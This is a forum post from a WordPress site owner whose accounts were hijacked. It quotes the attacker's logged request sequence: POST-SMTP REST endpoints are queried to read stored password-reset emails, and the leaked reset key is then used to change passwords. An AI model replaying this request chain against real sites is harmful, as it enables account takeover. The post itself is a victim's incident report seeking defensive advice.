Possible leakage of email logs?
-
I’ve just had one of my WordPress sites hacked — the only two registered users got password reset requests followed shortly afterwards by password changed confirmations. The site has been taken offline for now while I try to figure out how they did that.
I have been looking through the logs and found this sequence that comes from the IP address listed in the password reset request emails and coincides with the time the accounts were compromised.
It shows the attacker hitting on both WordPress authentication functions and POST-SMTP endpoints. The only simple way I can conceive they could succeed with the password resets is if they knew the contents of the reset request email… which is why the POST-SMTP log entries caught my eye.
Here is the sequence of requests up to approximately the time the first account was compromised.
POST /wp-json/post-smtp/v1/connect-app
GET /wp-json/post-smtp/v1/get-logs
GET /wp-json/wp/v2/users
POST /wp-login.php?action=lostpassword
… repeats a number of times
GET /wp-json/post-smtp/v1/get-logs
GET /wp-json/post-smtp/v1/get-log?id=334
GET /wp-admin/admin.php?access_token=fpupydtoihsgszleuhivseszhfcsdnuc&type=log&log_id=334
GET /wp-login.php?action=rp&key=q8SWvA19xeKq49i8pjId&login=elli&wp_lang=en_US
GET /wp-login.php?action=rp&wp_lang=en_US
POST /wp-login.php?action=resetpass
GET /wp-json/post-smtp/v1/get-log?id=333I accept my configuration of POST-SMTP may have been an issue, but would like to understand if this was in fact a possible attack vector and if so, how can I avoid it when I bring the site back from a backup?
- The topic ‘Possible leakage of email logs?’ is closed to new replies.